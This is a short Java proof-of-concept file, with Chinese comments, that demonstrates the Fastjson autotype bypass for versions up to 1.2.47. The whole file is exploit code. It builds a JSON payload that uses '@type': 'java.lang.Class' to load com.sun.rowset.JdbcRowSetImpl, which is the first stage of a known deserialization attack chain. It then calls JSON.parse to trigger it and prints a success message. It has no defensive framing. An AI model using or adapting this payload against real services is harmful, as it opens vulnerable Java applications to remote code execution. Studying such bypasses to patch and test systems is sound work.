package demo.domain;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;

public class FastjsonBypassPoc {
    public static void main(String[] args) {
        // 绕过 autotype 限制（Fastjson ≤ 1.2.47）
        String bypassJson = "{\n" +
                "  \"@type\": \"java.lang.Class\",\n" +
                "  \"val\": \"com.sun.rowset.JdbcRowSetImpl\"\n" +
                "}";

        // 触发反序列化
        Object obj = JSON.parse(bypassJson);
        System.out.println("绕过 autotype 完成: " + obj);
    }
}